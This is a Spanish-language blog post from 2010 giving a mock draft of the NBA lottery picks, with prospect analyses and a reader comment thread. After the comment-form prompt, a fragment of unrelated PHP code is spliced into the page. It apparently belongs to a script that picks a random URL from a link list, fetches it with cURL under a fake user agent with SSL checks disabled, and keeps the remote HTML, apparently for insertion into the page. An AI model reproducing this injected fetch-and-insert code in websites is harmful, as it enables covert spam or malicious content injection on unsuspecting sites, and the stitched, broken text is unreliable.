Mock Draft 2010 – Lottery Draft

20 de May de 2010 por kantonyo

La pasada madrugada se celebró el Lottery Draft para determinar la posición definitiva en que las franquicias elegirán en el próximo draft. Los Wizards han sido los ganadores, a pesar de que los Nets tenía todas las papeletas de llevarse el nº1 gracias a sus “méritos” deportivos durante toda la temporada. Surgen varias dudas después del sorteo entre ellas el qué va a pasar con Arenas si Washington termina eligiendo a John Wall. Jrue Holiday dio bastante suerte a los Sixers presenciando el sorteo, pero teniendo en cuenta que su equipo escogerá probablemente a Turner, no sabemos si él se ha dado suerte a sí mismo. A continuación las posiciones finales y su posible elección:

1. Washington Wizards – John Wall (Kentucky) Base – 1990

Finalmente los Wizards se han llevado el premio gordo del draft. Casi con total seguridad como se pudo ver en la retransmisión de anoche su elección será el base de Kentucky, John Wall. Las continuas lesiones de Arenas durante los últimos años nos hacen pensar que a los Wizards no les va a temblar la mano pero pensando en la plantilla, probablemente le vendría mucho mejor un jugador del estilo de Evan Turner, mucho más versátil y completo.

2. Philadelphia 76ers – DeMarcus Cousins (Kentucky) Alapívot – 1990

Probablemente el mejor jugador de este draft sea el jugador de Ohio State, Evan Turner. Pero no descartamos que por culpa del efecto Wall y por las necesidades de los Sixers pueda caer al tercer puesto. Los Sixers acertaron el año pasado con la adquisición en el draft del base Jrue Holiday y su jugador franquicia sigue siendo el escolta Andre Iguodala, además de disponer de Louis Williams en el exterior. El mal rendimiento de Elton Brand ha dejado la pintura de los Sixers como una de las más flojas de la conferencia, por lo que intentarán reforzar el quinteto con uno de los interiores más contundentes de este año, el alapívot de Kentucky, DeMarcus Cousins. Tampoco es descartable que se decanten por Turner y busquen un traspaso que traiga a Cousins y algo más.

3. New Jersey Nets – Evan Turner (Ohio State) Base/Escolta – 1988

Los Nets se han quedado sin su primera elección en el draft pero a largo plazo no puede ser tan malo. Con la “obligación” de escoger a John Wall nos estamos olvidando de que no está tan claro que el base de los Wildcats sea el mejor de este draft. Su nuevo dueño el ruso Mijail Projorov ha prometido hacer este equipo campeón en los próximos cinco años. Que mejor pilar que el escolta de los Buckeyes para empezar la reconstrucción. Tampoco le vendría mal que los Sixers le dejaran la opción de Cousins, ya que los Nets disponen de un buen trio de exteriores: Harris, Lee y T. Williams y junto con Lopez formarían un buen quinteto de futuro.

4. Minnesota Wolves – Wesley Johnson (Syracuse) Alero – 1987

Parece improbable que los Wolves busquen un base después de depositar su confianza el año pasado en Jonny Flynn y Ricky Rubio y tampoco parece que la plantilla necesite mejorar su juego interior si consiguen retener a Al Jefferson y Kevin Love. Seguramente intentarán reforzar el puesto de escolta o alero. Wesley Johnson es sin duda el jugador más espectacular de este draft. Destaca su explosividad en el contraataque que le hace imparable. No me cabe duda que dentro de unos años se convertirá en el favorito de muchos vosotros. Ha sido la sorpresa agradable en la temporada universitaria.

5. Sacramento Kings – Cole Aldrich (Kansas) Pívot – 1988

Parece que la pareja Hawes-Thompson no ha cuajado como se esperaba a principios de temporada. A pesar de la adquisición en invierno de Carl Landry, la plantilla de capital de California sigue pidiendo a gritos un pívot dominante. Que mejor que uno de los mejores interiores defensivos de la NCAA, el pívot de Kansas, Cole Aldrich. Hace poco en el blog se hablaba de que el éxito radica en juntar un buen exterior y un buen interior, pues parece que no pinta nada mal un duo Evans-Aldrich.

6. Golden State Warriors – Derrick Favors (Georgia Tech) Alapívot – 1991

Los Warriors tienen sin duda la obligación de reforzar su juego interior teniendo en nómina a Ellis, Curry, Morrow, Maggette, Azubuike … por lo que se presentan dos opciones muy probables: Derrick Favors o Greg Monroe aunque ambos han estado esta temporada muy por debajo de lo que se esperaba de ellos. El Alapívot de Georgia Tech a priori parece que tiene más margen de progresión.

7. Detroit Pistons – Greg Monroe (Georgetown) Alapívot – 1990

A pesar de que Greg Monroe ha perdido parte del prestigio con el que llegó a la NCAA puede ser elegido en el top10, sobre todo teniendo en cuenta las carencias de los equipos que eligen en los primeros puestos. Los Pistons necesitan mejorar su juego interior, aunque les vendría mejor un pívot de corte clásico como Aldrich si lo dejan caer a estas posiciones.

8. Los Angeles Clippers – Al-farouq Aminu (Wake Forest) Alero – 1990

Los Clippers necesitan urgentemente un base que presione o sustituya a Baron Davis, pero saliendo de esta posición va a ser difícil que lo puedan elegir por lo que buscaran seguramente mejorar la posición de alero, tras la marcha de Al Thornton. La duda puede estar entre Aminu o James Anderson. El de Wake Forest tiene unas cualidades atléticas impresionantes pero el Cowboy de OSU está más preparado para dar el salto.

9. Utah Jazz – Xavier Henry (Kansas) Escolta – 1991

Los Jazz son el único equipo clasificado para los playoffs que va a poder elegir entre los 10 primeros en el draft. Al disponer de una plantilla muy compensada será difícil mejorar un puesto de titular, por lo que buscaran futuro, y que mejor que el elegante jugador de Kansas, el escolta Xavier Henry.

10. Indiana Pacers – Avery Bradley (Texas) Escolta – 1990

Es difícil pensar que bases como Bledsoe, Vasquez o Warren salgan tan arriba, por lo que los Pacers deberán buscar un escolta o un alapívot. El joven Avery Bradley puede ser una apuesta a largo plazo.

11. New Orleans Hornets – James Anderson (Oklahoma St) Escolta/Alero – 1989

El puesto de alero es el más débil en la plantilla de New Orleans. James Anderson es uno de los mejores anotadores del año en la NCAA y puede ser un valor seguro sobre todo teniendo en cuenta que Kyle Singler y Jan Vesely no se presentaran al Draft 2010. Si se hacen con el jugador de Oklahoma State sin duda la plantilla de Hornets dará un paso de calidad tremendo.

12. Memphis Grizzlies – Donatas Motiejunas (Benetton Treviso) Alapívot – 1990

Tras el buen año de Conley y la difícil elección de un base en estos puestos, los Grizzlies intentarán reforzar su puesto de alero, también pensando en la posible marcha de Rudy Gay. El alapívot lituano cada vez gana más fuerza en el draft. Muchos especialistas lo comparan con el italiano Andrea Bargnani. Es un interior con muchos recursos ofensivos y un buen juego de pies.

13. Toronto Raptors – Ekpe Udoh (Baylor) Alapívot/Pívot – 1987

Los Raptors están más preocupados de la posible marcha de Chris Bosh que de sus posibilidades de elección en el draft. Pero el mal menor sería que Bosh ejerciera su opción de un año más y que los Raptors de esta forma buscaran un traspaso para conseguir algo importante a cambio. No habrá más remedio, por lo tanto, de reforzar el juego interior. Ekpe Udoh ha ganado bastante prestigio después de un gran torneo de la NCAA, donde ha demostrado ser uno de los mejores jugadores defensivos del año, parando a Omar Samhan o neutralizando en la final regional al juego interior de Duke, a la postre campeón de la NCAA.

14. Houston Rockets – Hassan Whiteside (Marshall) Pívot – 1989

La lesión de Yao Ming provoca dudas acerca del juego interior de Rockets a pesar del buen rendimiento de Luis Scola. Una plantilla con Brooks, Martin, Ariza y Battier, necesita como el comer un buen referente en el poste alto. Hassan ha saltado a los puestos altos del draft desde una universidad modesta gracias sobre todo a sus promedios en rebotes y tapones. Posiblemente estamos ante uno de los pívots con más potencial de este año, y sólo su ausencia en el March Madness puede frenarle su progresión en el puesto final.

15. Milwaukee Bucks – Ed Davis (North Carolina) Alapívot – 1989

Si algo ha quedado claro en los playoffs por parte de Bucks tras la lesión de Bogut, es que no hay nada más allá del australiano. Milwaukee deberá buscar un buen complemento a Andrew, y que mejor que el jugador de los Tar Heels. Ed Davis es un jugador de un corte totalmente distinto a Bogut, por lo que puede dar más versatilidad al juego interior de los Bucks. Ed no ha estado a la altura de lo que prometió en la final de la NCAA del 2009 y se ha perdido la última fase de la temporada por una lesión.

16. Minnesota Wolves – Gordon Hayward (Butler) Alero – 1990

Los Wolves intentarán seguir apuntalando su puesto de escolta o alero. Gordon Hayward ha sido la gran atracción de la Final Four de este año, llevando los Bulldogs muy cerca de ser campeones de la NCAA contra todo pronóstico. El mayor regalo que le puede pasar a Wolves es que Henry o Bradley caigan a estos puestos del draft.

17. Chicago Bulls – Solomon Alabi (Florida State) Pívot – 1988

A pesar del buen año de Taj Gibson y Noah, los Bulls todavía necesitan mejorar su juego en la pintura, con un pívot de corte más clásico. Cruzarán los dedos para que puedan elegir a Hassan o Ekpe Udoh, pero estará difícil, por lo que tendrán que conformarse con Alabi, Varnado o Gani Lawal, los tres con características muy parecidas. El nigeriano es el jugador más alto de los que optan a entrar en el draft.

18. Miami Heat – Paul George (Fresno State) Alero – 1990

Es difícil saber qué van a necesitar los Heat cuando la continuidad de la mayor parte de la plantilla está en el aire, por lo que intentarán escoger lo mejor en su puesto. Paul George se ha colado en los puestos altos a pesar de jugar en una Universidad muy modesta dentro de una conferencia débil. Físicamente nos recuerda bastante a Danny Granger

19. Boston Celtics – Jarvis Varnado (Mississippi State) Pívot – 1988

Los Celtics continúan necesitando reforzar su juego interior después del bajo nivel ofrecido por Rasheed Wallace durante la Regular Season. Jarvis Varnado ha conseguido este año el record de tapones en la NCAA y ha sido elegido el mejor jugador defensivo del año. Gani Lawal o Daniel Orton, también podrían ser buenas opciones

20. San Antonio Spurs – Patrick Patterson (Kentucky) Alapívot – 1989

El forward de Kentucky, pareja de DeMarcus Cousins en el juego interior de los Wildcats este año, está avanzando en los mockdraft poco a poco. Es un jugador muy sólido que vendría de lujo para reforzar a los Spurs.

21. Oklahoma City Thunder – Gani Lawal (Georgia Tech) Alapívot/Pívot – 1988

Los Thunder posiblemente dispongan de una de las plantillas con más potencial de la competición pero si hay un puesto en el que todavía no han encontrado un jugador referencia es el puesto de pívot. A la espera de que Serge Ibaka acabe de madurar lo suficiente, podrían decantarse por el compañero de Favors en Georgia Tech, Gani Lawal.

22. Portland Trail Blazers – Daniel Orton (Kentucky) Pívot – 1990

Tras la lesión de Greg Oden surgen algunas dudas acerca de la fortaleza física del nº 1 del draft de 2008. Además no está clara la renovación de Camby debido sobre todo a su edad, por lo que los Blazers podrían buscar refuerzos en el poste alto. El joven pívot suplente de Kentucky es uno de los interiores más prometedores de esta hornada. Ha estado a la sombra durante toda la temporada de Patterson y Cousins.

23. Minnesota Wolves – Jordan Crawford (Xavier) Escolta – 1988

Los Wolves en su tercera elección esta vez sí, buscaran un escolta anotador. Jordan Crawford saltó a la fama por su mate en la cara de LeBron James en un entrenamiento y nos acabó de convencer por su gran torneo NCAA con la Universidad de Xavier.

24. Atlanta Hawks – Devin Ebanks (West Virginia) Alero – 1989

Después del pésimo rendimiento de Marvin Williams en los playoffs, surge la obligación de reforzar el puesto de alero en los Hawks. Devin Ebanks puede ser el único jugador de West Virginia en entrar en el draft después de llegar a la Final Four. Es un gran defensor y puede ser muy válido como jugador de banquillo desde el primer momento.

25. Memphis Grizzlies – Eric Bledsoe (Kentucky) Base – 1990

Los Grizzlies deberán buscar un base suplente que pueda ser una alternativa a Mike Conley si este no acaba de cuajar. El mejor candidato es el suplente de John Wall en los Wildcats, el jugador de primer año Eric Bledsoe. Su talento ha estado a la sombra de Wall. Todo apunta que se presentará al draft, a pesar de que le vendría mejor esperar un año para ser el titular de los Wildcats y así de este modo optar a un top 10 la próxima temporada.

26. Oklahoma City Thunder – Greivis Vasquez (Maryland) Base – 1987

Los Thunder seguirán apuntalando su plantilla. A pesar del buen rendimiento como base de Russell Westbrook no deja de ser un escolta. La incorporación de un base clásico al estilo de Greivis Vasquez podría permitir jugar durante parte de los partidos con un quinteto distinto que daría más versatilidad a la plantilla: Vasquez-Westbrook-Durant-Green-Ibaka. El venezolano destaca por su visión del juego y su capacidad de controlar los tiempos del juego.

27. New Jersey Nets – Larry Sanders (VCU) Alapívot – 1988

Si consiguen apropiarse de un jugador exterior como Evan Turner, esta vez los Nets deberán buscar un complemento a Brook Lopez. El de Virginia destaca por su explosivo físico que le permite ser un buen defensor y reboteador, justo lo que New Jersey necesita.

28. Memphis Grizzlies – Dominique Jones (South Florida) Escolta – 1988

Memphis buscará en esta nueva elección un suplente para OJ Mayo. Dominique Jones ha mejorado en su último año en la NCAA en su faceta anotadora. Es un jugador con gran capacidad de concentración y liderazgo, lo que le ha permitido rozar en más de alguna vez los triples dobles, tan difíciles de realizar en la liga universitaria.

29. Orlando Magic – Stanley Robinson (Connecticut) Alero – 1988

Orlando intentará mejorar su puesto de alero, que es el más débil de la plantilla. Robinson, Damion James, Luke Babbitt o el serbio Nemanja Bjelica pueden ser buenas opciones. El jugador de Connecticut destaca por su potente físico y buena defensa.

30. Washington Wizards – Craig Brackins (Iowa State) Alapívot – 1987

Los Wizards después de reforzar su exterior con John Wall, buscaran un interior. Craig Brackins está avanzando en las apuestas pasito a pasito. Este año ha bajado su rendimiento pero no ha dejado de hacer muy buenos números. También habría alguna posibilidad de buscar mejorar su puesto de escolta con un hombre como el jugador de Memphis Tigers, Elliot Williams.

Comenta

20 comentarios a esta entrada

  1. Love Denise dice:
    #1

    Vaya pedazo de articulo!!, felicidades kantonyo

      Citar

  2. TheDeerHunter dice:
    #2

    Pues Arenas va a ser un “mentor” de Wall cojonudo XD

      Citar

  3. Txusma dice:
    #3

    Comentando un poco el mock draft:
    – Por mucho que a los Sixers le haga falta juego interior creo que apostarán por Turner que tiene pinta de ser muy bueno. Y no tengo claro que lo hagan para considerarlo base sinó más bien escolta. De esta manera les queda un juego exterior bastante majo con Holiday, Turner e Iguodala.
    – Favors o Cousins? Muchos mocks dan a Favors en el 3 para NJ y al que bajan posiciones es a Cousins. pq te decantas más por Cousins, kantonyo?
    – Me gusta mucho Wesley Johnson pero no se yo si saldrá tan arriba.
    – Avery Bradley en el 10? Creo que lo dudo bastante. Viene muy, muy verde aunq con mucho potencial, no?
    – Y hay que ver lo que bajas la elección de Patrick Patterson…

    Gran artículo con enormes fotos! La de Cousins o Greg Monroe es que parecen de verdad!

      Citar

  4. sayim dice:
    #4

    enhorabuena por el artículo… Lo que se aprende con esto. Yo que soy un autentico ignorante de la liga univesitaria (creo que no vi un partido entero en mi vida) voy a poder darmelas de entendido en las charlas con los amigos….

    Un saludo

      Citar

  5. Hynreck dice:
    #5

    Bueno, al parecer Doug Collins nuevo entrenador Sixer ya ha declarado que su jugador favorito del draft es Turner, así que sería un sorpreson que de estar disponible no lo eligiese. Yo me la jugaría por él en el draft como 2, incluso no descartaría que hubiese sorpresa en el 1.

      Citar

  6. kantonyo dice:
    #6

    Yo no descarto incluso que Turner salga elegido en primera posición, para mi es el mejor. Pero la historia nos dice que muy pocas veces los equipos se arriesgan no eligiendo al favorito, quizas este el caso de Derrick Rose ultimamente. Y por otra parte, los Sixers tienen ya a Iguodala, Williams, Holiday, Thaddeus Young y Willie Green, estan más que servidos de exteriores, en cambio en la pintura Brand no ha cuajado y gana un pastón, Dalembert tambien gana una pasta para su rendimiento. Creo que sólo es valido Speights y tampoco es gran cosa, por lo que Sixers necesita un interior. También está la posibilidad de elegir a Turner y buscar traspaso con Evan o con algo que tengan.

    Derrick Favors no ha demostrado absolutamente nada en la NCAA, viene con fama del instituto, está muy verde y Cousins es el típico jugador que sólo con su caracter y garra sabes que va ayudar desde el principio. En su contra está su mentalidad, es un tipo muy inestable.

    Lo de Wesley Johnson es un poco personal, llevo tiempo viendole en top5, ahora ultimamente ya hay varias webs como NBADRAF.net (#4), Draftexpres.com (#6), Hoopshype (#6), mynbadraft.com (#4), ESPN (#4) que lo colocan alto. No me imagino a un equipo como Sacramento por ejemplo dejarle perder. Un duo Tyreke-Wesley es una pasada!

    Si un tipo como Avery Bradley, jovencisimo, que puede esperarse al año que viene quedandose en una gran universidad como Texas se presenta al draft, es que espera quedar en buena posición, tendrá información, sino se equivocaria completamente en dar el salto tan pronto.

    Respecto a Patrick Patterson, es curioso pero casi todo la plantilla de Wildcats tiene posibilidad de estar entre el top 20, WALL-COUSINS-PATTERSON-ORTON-BLEDSOE y en cambio no llegaron ni siquiera a la Final Four. En el caso de Patterson no veo mucha capacidad de progresión, es una posición que me baila mucho, 12-25, puede que caiga o que alguien se decida a elegirle, tengo muchas dudas.

      Citar

  7. kantonyo dice:
    #7

    Bueno, aunque sea el entrenador Collins, la responsabilidad estará en Stefanski y el ha declarado que aunque considera a Turner el mejor no descarta a Favors y Cousins o incluso buscar un traspaso. La pregunta estaría en q pasaría si Wizards se decanta por Turner, Philadelphia se quedaría con Wall o buscaria un interior??

    Creeis que el juego interior de Sixers es competitivo, como para no buscar refuerzos?

      Citar

  8. Viva_Dirk dice:
    #8

    Creo que depende de lo que confien en que Brand se recupere, seguro que ya no esperan un 20-10, pero quizá si piensen que con Speights y la posibilidad de usar a Young de 4 pueden decidirse por Turner, yo lo haría.

    Ah, yo si pienso que Wall es el mejor del draft, y ojala los Wizars no lo jodan.

      Citar

  9. Dantley2 dice:
    #9

    Gran artículo. Veo a Turner en Philly, pasarán a Iguodala al 3 o incluso buscarán un trade. No confían en Speights, es un jugadorazo bestial, pero se deja llevar mucho en defensa. Pero aún así, Turner puede rendir ya y Cousins es para tenerle paciencia, aunque tambien es verdad que no es descartable que sea un pivot de los que cambian el futuro de una franquicia.

    Favors imagino que saldrá más arriba, los centímetros suelen pesar.

    Johnson tiene muy buena pinta, estoy de acuerdo que de Sacramento no pasa. No las tengo todas conmigo con Aldrich, no sé, será que físicamente me recuerda a Fran Vázquez.

    Xavier Henry me gusta, muy fino. A ver, porque me suelo equivocar en este tipo de jugadores

      Citar

  10. max dice:
    #10

    Felicidades por el articulo Kantonyo. La NCAA no la domino para nada y esta información de cara al draft y a la proxima temporada es una pasada…. Por cierto, la última vez que Washington escogió en primera posición (2001) se llevaron un paquete. Supongo que jugarán a un valor seguro.

      Citar

  11. Viva_Dirk dice:
    #11

    Dantley no creo que sea posible ‘equivocarse’ con un tipo como Henry, otra cosa es las oportunidades que tenga porque buen jugador es, como por ejemplo Ellington, una cosa es la carrera que haga y otra que es un muy buen jugador.

    A mi Aldrich me da mucha confianza, creo que sería perfecto para acompañar a un jugador tipo Boozer, Zach o similar porque es muy serio y en ataque no es un tronco.

      Citar

  12. portu dice:
    #12

    Veo dificilísima la elección para Minesota, se encuentran con un pick 4 q no te permite planear mucho, pueden verse a última hora con la sorpresa de poder llevarse a Cousins (a priori parece q por potencial no debería pasar del 3) y no sé si lo elegirían pq el overbooking contando a K. Love y Al Jefferson. Tb podría suceder lo q dice Kantonyo y optar por Wes Johnson, pero en la posición de 3 tienen a un jugador en progresión como C. Brewer y otro jugador cumplidor como R. Gomes. La posición de 2 sí q es un solar, y en la posición de 1 lo q todos sabemos Ricky, Sessions y Flynn… es una plantilla tan descompensada q creo q les obliga a moverse obligatoriamente y creo q deben apostar por ir a muerte a por el pick 2, Evan Turner debería ser su único propósito en este draft.

    A P. Patterson tb lo veo muy bajo, no sé, no lo he visto jugar en directo, pero los mocks más antiguos lo llegaban incluso a poner pick 5.
    Philly irá a por Turner seguro, Iguodala sería un 3 perfecto y Holiday es un buen 1, L. Williams tb haría un papel excelente de 6º hombre. Aunque no hayan cumplido con las expectativas ahora mismo no pueden quitarse de encima a Brand y Dalembert, mientras q Speights algo tiene, tb puede ayudar T. Young de 4 como decía Viva, no creo q las prioridades para Philly deban ser el juego interior… otra cosa sería si consiguen librarse de Brand, claro.

    En cuanto al nº1 yo todavía no descartaría q sucediese lo mismo q con D. Rose… sólo a una semana del draft o así empezó a aparecer como posible pick 1 en los mocks… en los Wizards iría tb muy bien Turner, aunque lo veo como Txus, de 2.

      Citar

  13. sergio dice:
    #13

    Gran artículo Kantonyo. Lo veo basado en necesidades más que en calidad o potencial. Creo que es como deben hacerse las predicciones ahora mismo. Cuando los equipos comiencen a hablar de traspasos quizás sus gustos hacia ciertos jugadores cambie. Por ejemplo, en el caso Minnesota, si consiguen un equipo interesado en Jefferson que les dé un escolta-alero de calidad, se irían a por Aldrich o Cousins para juntarlo con Love. Es demasiado pronto para hacer cábalas definitivas.

    Kantonyo.. tengo la impresión de que Wesley Johnson o James Anderson pueden ser grandes tapados de este Draft. No optan a un top 3 del Draft pero pueden tener un impacto inmediato en la Liga con un poquito de confianza en si mismos. Pueden ser (salvando las distancias) robos como Ginobili, Parker,…??

      Citar

  14. kantonyo dice:
    #14

    Wesley Johnson y James Anderson son jugadores de un corte muy parecido. Ambos son aleros anotadores que si todo les va bien, por su personalidad y estilo de juego pueden llegar a ser jugadores franquicias. Si por ejemplo pasa lo que he puesto en el mockdraft y New Orleans selecciona a Anderson, dará un salto de calidad ofensivo tremendo viendo como han rendido Thornton y Collison este año.

    En contra de Wesley está que ha tenido que ser en su último año cuando ha dado el salto a la primera linea de la NCAA, después de haber sido traspasado (muy poco frecuente los traspasos en NCAA y que le dejó sin jugar 2008-09 según las normas) de Iowa State donde tampoco había sobresalido especialmente. Es de 1987, de los más veterano del draft, esto juega en su contra creo.

    Hablando de robos, podría ser el caso de Vasquez, creo que va a ser dificil que salga en primera ronda, pero a mi es un jugador que me encanta, y sobre todo para ACB, aquí tendría hueco seguro por su tipo de juego. Además es super agradable, le tengo en Twitter, y el tio si le preguntas algo te suele responder super amable.

    Más dudas tengo en Harangody, ha sido un referente en la NCAA en los ultimos años. Es posible que salga en los últimos puestos de la segunda ronda. Su talento está ahí … Y no es descartable que con el tiempo nos llegue a parecer un robo.

    Otros jugadores que han bajado mucho su caché en los últimos tiempos y que saldran en puestos bajos son: Trevor Booker, Sherron Collins, Dexter Pittman o Willie Warren.

      Citar

  15. sergio dice:
    #15

    A eso me refería Kantonyo. Jugadores similares destinados a anotar y si son elegidos en equipos que necesiten ese perfil en su demarcación pueden tener unas grandes estadísticas a final de temporada con un poquito de suerte. Los datos que dices que pueden jugar en su contra supongo que se refieren en cuanto a la posición en el draft o las expectativas que puedan crear. Por lo que he visto de ellos sus calidad está ahí y no deberían tener problemas para sacarla. Eso espero al menos….

      Citar

  16. NBA LAKERS BLOG dice:
    #16

    Cierto, genial el artículo. Debo decir que los Wizards en el N°1 me tomó por sorpresa.

    Te espero en nuestro blog de los Lakers 😉

    Un fuerte abrazo!

    -NM-

      Citar

  17. Óscar dice:
    #17

    Creo que Ed Davis estará más arriba que ese #15, seguramente en el top-7. Enorme talento y perfil NBA, zurdo y muy completo. También más alto estarán seguramente Favors (#4), Patterson (10) y Eric Bledsoe (sobre el 15). Quitando los 3/4 primeros, los mejores picks pueden ser Wesley Johnson, Xavier Henry, Gordon Hayward y Paul George, además de Davis. También Devin Ebanks, un all-around player al que sólo le falla el tiro de larga distancia. Muy interesante como final 1ª/ principio de 2ª ronda.
    Ojalá esté Vásquez en primera ronda, un gran jugador, pero lo dudo. La única duda, su físico.
    El Wesley Matthews de este año (no dafteado) quizás podría ser Jerome Dyson (Villanova), base-escolta de buenas condiciones para la NBA que se ha ido cayendo en los drafts simulados hasta quedarse fuera. Veremos.

    Un draft el de 2010 bastante profundo, excepto en lo que se refiere a los bases, más allá de John Wall. Yo apostaría por Evan Turner como #1, pero por lo mediático de Wall se puede llevar al primer puesto.

    Gran montaje, Kantonyo. Y ojito a nuestros Blazers, ya verás que equipito armamos… con o sin Rudy.
    Orton es un buen proyecto, pero creo que KP elegirá a alguien tipo Udoh, Lawal, S. Robinson o sobre todo Larry Sanders… un poco de leña para el juego interior, pero no parece gran cosa, salvo quizás Sanders.

      Citar

  18. kantonyo dice:
    #18

    Oscar, crees que después de una temporada tan mediocre y con una lesión que le ha tenido fuera los últimos meses de competición, Ed DAvis, puede optar a un puesto mejor?? A mi si me lo dices hace un año, yo le hubiera metido en el top5 seguro, pero me ha decepcionado bastante. Además no consiguió clasificar a North Carolina para el March Madness, dejando a UNC en los peores puestos del últimos años y cuando se lesionó los Tar Heels cambiaron para mejor llegando a la final del NIT, dejando al joven John Henson mostrar sus cualidades en su puesto ya le colocan en top10 el año que viene. Creo que son datos en contra de Davis que crean dudas sobre su elección, aunque potencial tiene de sobra, como bien dices es un jugador hecho para la NBA.

    Favors estará sin duda entre el top3-top7, es díficil asegurar que no baile su puesto en ese espacio, tampoco ha sido un gran referente este año para darle tan claramente en el puesto 4, y ha estado muy bien arropado en la pintura este año en Georgia Tech con Gani Lawal.

    Respecto a Bledsoe, si tienes razón que se merece un puesto mejor, y más teniendo en cuenta la escasez de bases, pero creo que le he puesto más alto que la mayoria de los mockdraft, no me sorprenderia un top15.

    Con Vasquez, reconozco q me tiran mis ganas, estará si no hay sorpresas en mitad de segunda ronda.

    Y ojalá que Blazers se haga con los derechos de Ekpe Udoh…. pero yo apuesto por que estará mas arriba que la posición del equipo de Oregon.

      Citar

  19. kantonyo dice:
    #19

    El lituano Donatas Motiejunas parece que se ha borrado del draft de este año. Parece que no habrá ningún europeo entre los 30 selecionados de la primera ronda.

    Otras cosas a destacar es que muchos Mockdraft dan a Gordon Hayward en la posición 10 de Indiana. Parece que su magnifica temporada en Butler(Indiana) le ha dado mucho caché en este estado y podrían elegirle en este puesto tan alto a priori.

    Patterson tambien está subiendo bastante y muchos le empiezan a situar entre el top 10.

    Empiezan a entrar en los puestos altos jugadores que no han tenido una actuación destacada este año en la NCAA, como Paul George, Luke Babbitt, Hassan Whiteside, Larry Sanders o Armon Johnson. Parece que estan convenciendo en los workouts.

    Y tambien es notorio que Cole Aldrich se desinfa, y hay quien lo ve fuera del top 10.

      Citar

  20. Txusma dice:
    #20

    Donde puedo consultar cosas concretas sobre los workouts? A veces en draftexpress y nbadraft no acaban de actualizar la info de los jugadores…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>